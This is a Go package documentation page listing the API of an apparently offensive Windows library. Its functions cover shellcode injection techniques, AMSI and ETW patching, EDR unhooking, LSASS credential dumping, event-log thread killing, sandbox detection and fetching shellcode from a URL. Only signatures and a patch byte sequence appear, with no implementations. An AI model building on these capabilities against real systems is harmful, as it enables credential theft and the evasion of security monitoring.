core

package
v0.0.0-...-6d634a3 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Oct 18, 2023 License: MIT Imports: 24 Imported by: 0

Documentation

Index

Constants

View Source 
const (
	// MEM_COMMIT is a Windows constant used with Windows API calls
	MEM_COMMIT = 0x1000

	// MEM_RESERVE is a Windows constant used with Windows API calls
	MEM_RESERVE = 0x2000

	// PAGE_EXECUTE_READ is a Windows constant used with Windows API calls
	PAGE_EXECUTE_READ = 0x20

	// PAGE_READWRITE is a Windows constant used with Windows API calls
	PAGE_READWRITE = 0x04
)
View Source 
const (
	IDX = 32
)

Variables

View Source 
var HookCheck = []byte{0x4c, 0x8b, 0xd1, 0xb8} // Define hooked bytes to look for

Functions

func AutoCheck 

func AutoCheck() error

func BlockHandle 

func BlockHandle() error

func CalcShellcode 

func CalcShellcode() []byte

func CheckBytes 

func CheckBytes(b []byte) (uint16, error)

func CheckCpu 

func CheckCpu() bool

func CheckDisk 

func CheckDisk() (bool, error)

func CheckDrivers 

func CheckDrivers() bool

func CheckHighPrivs 

func CheckHighPrivs() (bool, error)

func CheckHostname 

func CheckHostname() (bool, error)

func CheckInternet 

func CheckInternet() bool

func CheckMemory 

func CheckMemory() (bool, error)

func CheckProcess 

func CheckProcess() (bool, error)

func CheckUsername 

func CheckUsername() (bool, error)

func ClassicUnhook 

func ClassicUnhook(funcnames []string, dllpath string) error

This function unhooks given functions of especified dll

func ConvertBytes 

func ConvertBytes(dllBytes, functionHash, userData []byte) []byte

func ConvertDllBytesToShellcode 

func ConvertDllBytesToShellcode(dll_bytes []byte, func_name string, data string) ([]byte, error)

func ConvertDllToShellcode 

func ConvertDllToShellcode(dll_file string, func_name string, data string) ([]byte, error)

func ConvertStringSecurityDescriptorToSecurityDescriptorW 

func ConvertStringSecurityDescriptorToSecurityDescriptorW(p1 uintptr, p2 uintptr, p3 uintptr, p4 uintptr) error

func CreateProcess 

func CreateProcess(shellcode []byte, pid int) error

func CreateRemoteThread 

func CreateRemoteThread(shellcode []byte, pid int) error

func CreateRemoteThreadHalos 

func CreateRemoteThreadHalos(shellcode []byte) error

func DetectHooks 

func DetectHooks() ([]string, error)

func DumpLsass 

func DumpLsass(output string) error

func ElevateProcessToken 

func ElevateProcessToken() error

Enable SeDebugPrivilege

func EnableACG 

func EnableACG() error

func EnumSystemLocales 

func EnumSystemLocales(shellcode []byte) error

func EnumSystemLocalesHalos 

func EnumSystemLocalesHalos(shellcode []byte) error

func EtwpCreateEtwThread 

func EtwpCreateEtwThread(shellcode []byte) error

func Execute 

func Execute(shellcode []byte) error

func Fibers 

func Fibers(shellcode []byte) error

func FullUnhook 

func FullUnhook(dllpath string) error

Load fresh DLL copy in memory

func FuncFromHash 

func FuncFromHash(hash string, dll string, hashing_func func(str string) string) (uint16, string, error)

Check if hash is a valid function and return its proc

func GetEventLogPid 

func GetEventLogPid() (uint32, error)

func GetFuncPtr 

func GetFuncPtr(funcname string) (uint64, error)

func GetNtdllStart 

func GetNtdllStart() (start uintptr, size uintptr)

func GetShellcodeFromFile 

func GetShellcodeFromFile(file string) ([]byte, error)

func GetShellcodeFromUrl 

func GetShellcodeFromUrl(sc_url string) ([]byte, error)

func GetSysId 

func GetSysId(funcname string) (uint16, error)

Return syscall from memory, if it fails it tries to get syscall from disk

func HalosFuncFromHash 

func HalosFuncFromHash(hash string, hashing_func func(str string) string) (uint16, string, error)

func Inject 

func Inject(shellcode []byte, technique string, pid int) error

func IsHooked 

func IsHooked(funcname string) (bool, error)

func PatchAmsi 

func PatchAmsi() error

func PatchEtw 

func PatchEtw() error

func PatchUnhook 

func PatchUnhook(func_to_unhook string) error

Write to function address: 0x90, 0x90, 0x4c, 0x8b, 0xd1, 0xb8, 0xc1, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90

func PerunsUnhook 

func PerunsUnhook() error

func Phant0m 

func Phant0m(eventlog_pid uint32) error

Recommended function

func Phant0mWithOutput 

func Phant0mWithOutput(eventlog_pid uint32) error

This function does the same but also prints threads IDs

func QueueUserApc 

func QueueUserApc(shellcode []byte) error

func RandomInt 

func RandomInt(max int, min int) int

Generate a random integer between range

func RandomString 

func RandomString(length int) string

func RtlCreateUserThread 

func RtlCreateUserThread(shellcode []byte, pid int) error

func StrToSha1 

func StrToSha1(str string) string

Convert string to Sha1 (used for hashing)

func Syscall 

func Syscall(callid uint16, argh ...uintptr) (errcode uint32, err error)

Receives function address and arguments

func UuidFromString 

func UuidFromString(shellcode []byte) error

func VirtualAlloc 

func VirtualAlloc(handle uintptr, zero uintptr, regionsize uintptr, allocType uintptr, allocProtection uintptr) (uintptr, error)

addr, err := VirtualAlloc(pHandle, 0, uintptr(len(shellcode)), windows.MEM_COMMIT | windows.MEM_RESERVE, windows.PAGE_READWRITE)

func VirtualProtect 

func VirtualProtect(pHandle uintptr, addr uintptr, regionsize uintptr, newProtect uintptr, oldProtect uintptr) error

err := VirtualProtect(pHandle, &addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))

func WriteBytes 

func WriteBytes(module string, proc string, data *[]byte) error

func WriteMemory 

func WriteMemory(inbuf []byte, destination uintptr)

func WriteProcessMemory 

func WriteProcessMemory(pHandle uintptr, addr uintptr, buffer uintptr, buffer_len uintptr) error

err := WriteProcessMemory(pHandle, addr, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

Types

type CLIENT_ID 

type CLIENT_ID struct {
	UniqueProcess uintptr
	UniqueThread  uintptr
}

type ClientID 

type ClientID struct {
	UniqueProcess windows.Handle
	UniqueThread  windows.Handle
}

type Export 

type Export struct {
	Name           string
	VirtualAddress uintptr
}

type IMAGE_DATA_DIRECTORY 

type IMAGE_DATA_DIRECTORY struct {
	VirtualAddress uint32
	Size           uint32
}

type IMAGE_DOS_HEADER 

type IMAGE_DOS_HEADER struct {
	E_magic    uint16     // Magic number
	E_cblp     uint16     // Bytes on last page of file
	E_cp       uint16     // Pages in file
	E_crlc     uint16     // Relocations
	E_cparhdr  uint16     // Size of header in paragraphs
	E_minalloc uint16     // Minimum extra paragraphs needed
	E_maxalloc uint16     // Maximum extra paragraphs needed
	E_ss       uint16     // Initial (relative) SS value
	E_sp       uint16     // Initial SP value
	E_csum     uint16     // Checksum
	E_ip       uint16     // Initial IP value
	E_cs       uint16     // Initial (relative) CS value
	E_lfarlc   uint16     // File address of relocation table
	E_ovno     uint16     // Overlay number
	E_res      [4]uint16  // Reserved words
	E_oemid    uint16     // OEM identifier (for E_oeminfo)
	E_oeminfo  uint16     // OEM information; E_oemid specific
	E_res2     [10]uint16 // Reserved words
	E_lfanew   uint16     // File address of new exe header
}

type IMAGE_FILE_HEADER 

type IMAGE_FILE_HEADER struct {
	Machine              uint16
	NumberOfSections     uint16
	TimeDateStamp        uint32
	PointerToSymbolTable uint32
	NumberOfSymbols      uint32
	SizeOfOptionalHeader uint16
	Characteristics      uint16
}

type IMAGE_NT_HEADER 

type IMAGE_NT_HEADER struct {
	Signature      uint32
	FileHeader     IMAGE_FILE_HEADER
	OptionalHeader IMAGE_OPTIONAL_HEADER
}

type IMAGE_OPTIONAL_HEADER 

type IMAGE_OPTIONAL_HEADER struct {
	Magic                       uint16
	MajorLinkerVersion          uint8
	MinorLinkerVersion          uint8
	SizeOfCode                  uint32
	SizeOfInitializedData       uint32
	SizeOfUninitializedData     uint32
	AddressOfEntryPoint         uint32
	BaseOfCode                  uint32
	ImageBase                   uint64
	SectionAlignment            uint32
	FileAlignment               uint32
	MajorOperatingSystemVersion uint16
	MinorOperatingSystemVersion uint16
	MajorImageVersion           uint16
	MinorImageVersion           uint16
	MajorSubsystemVersion       uint16
	MinorSubsystemVersion       uint16
	Win32VersionValue           uint32
	SizeOfImage                 uint32
	SizeOfHeaders               uint32
	CheckSum                    uint32
	Subsystem                   uint16
	DllCharacteristics          uint16
	SizeOfStackReserve          uint64
	SizeOfStackCommit           uint64
	SizeOfHeapReserve           uint64
	SizeOfHeapCommit            uint64
	LoaderFlags                 uint32
	NumberOfRvaAndSizes         uint32
	DataDirectory               [16]IMAGE_DATA_DIRECTORY
}

type IMAGE_OPTIONAL_HEADER32 

type IMAGE_OPTIONAL_HEADER32 struct {
	Magic                       uint16
	MajorLinkerVersion          byte
	MinorLinkerVersion          byte
	SizeOfCode                  uint32
	SizeOfInitializedData       uint32
	SizeOfUninitializedData     uint32
	AddressOfEntryPoint         uint32
	BaseOfCode                  uint32
	BaseOfData                  uint32 // Different from 64 bit header
	ImageBase                   uint64
	SectionAlignment            uint32
	FileAlignment               uint32
	MajorOperatingSystemVersion uint16
	MinorOperatingSystemVersion uint16
	MajorImageVersion           uint16
	MinorImageVersion           uint16
	MajorSubsystemVersion       uint16
	MinorSubsystemVersion       uint16
	Win32VersionValue           uint32
	SizeOfImage                 uint32
	SizeOfHeaders               uint32
	CheckSum                    uint32
	Subsystem                   uint16
	DllCharacteristics          uint16
	SizeOfStackReserve          uint64
	SizeOfStackCommit           uint64
	SizeOfHeapReserve           uint64
	SizeOfHeapCommit            uint64
	LoaderFlags                 uint32
	NumberOfRvaAndSizes         uint32
	DataDirectory               uintptr
}

type IMAGE_OPTIONAL_HEADER64 

type IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER

type MayBeHookedError 

type MayBeHookedError struct {
	Foundbytes []byte
}

func (MayBeHookedError) Error 

func (e MayBeHookedError) Error() string

type PEB 

type PEB struct {
	InheritedAddressSpace    byte // BYTE	0
	ReadImageFileExecOptions byte // BYTE	1
	BeingDebugged            byte // BYTE	2

	Mutant            uintptr // BYTE 4
	ImageBaseAddress  uintptr // BYTE 8
	Ldr               uintptr // PPEB_LDR_DATA
	ProcessParameters uintptr // PRTL_USER_PROCESS_PARAMETERS

	AtlThunkSListPtr uintptr // PVOID

	AtlThunkSListPtr32 uint32 // ULONG

	PostProcessInitRoutine uintptr // PPS_POST_PROCESS_INIT_ROUTINE

	SessionId uint32 // ULONG
	// contains filtered or unexported fields
}

type PROCESS_BASIC_INFORMATION 

type PROCESS_BASIC_INFORMATION struct {
	PebBaseAddress uintptr // PPEB

	UniqueProcessId              uintptr // ULONG_PTR
	InheritedFromUniqueProcessID uintptr // PVOID
	// contains filtered or unexported fields
}

https://github.com/elastic/go-windows/blob/master/ntdll.go#L77

type PROCESS_MITIGATION_DYNAMIC_CODE_POLICY 

type PROCESS_MITIGATION_DYNAMIC_CODE_POLICY struct {
	ProhibitDynamicCode uint32
}

type PTHREAD_BASIC_INFORMATION 

type PTHREAD_BASIC_INFORMATION struct {
	AffinityMask uintptr
	Priority     int
	BasePriority int
	// contains filtered or unexported fields
}

type SC_SERVICE_TAG_QUERY 

type SC_SERVICE_TAG_QUERY struct {
	// contains filtered or unexported fields
}

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.